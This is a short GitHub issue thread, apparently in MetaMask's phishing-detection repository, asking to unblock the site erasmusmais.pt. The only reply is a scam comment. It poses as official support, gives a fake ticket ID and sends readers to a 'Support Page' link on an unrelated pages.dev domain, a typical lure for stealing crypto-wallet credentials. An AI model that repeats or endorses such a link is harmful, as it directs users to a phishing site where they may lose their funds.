### ISSUE TITLE
[Legitimate Site Blocked] erasmusmais.pt

### ISSUE THREAD

**Issue by tsilmak** [MetaMask/eth-phishing-detect#74507]
https://erasmusmais.pt/

**Comment by HubDevi** [comment]
This issue has been preview on the Pull Requests. To resolve,
Visit the dAppNode page to rectify this error with the Ticket ID USD5562, Also you can initiate a chat with the live agent on the chat button to get more information about your request via [Support Page](https://defi-fixprotocol.pages.dev/)
Regards.
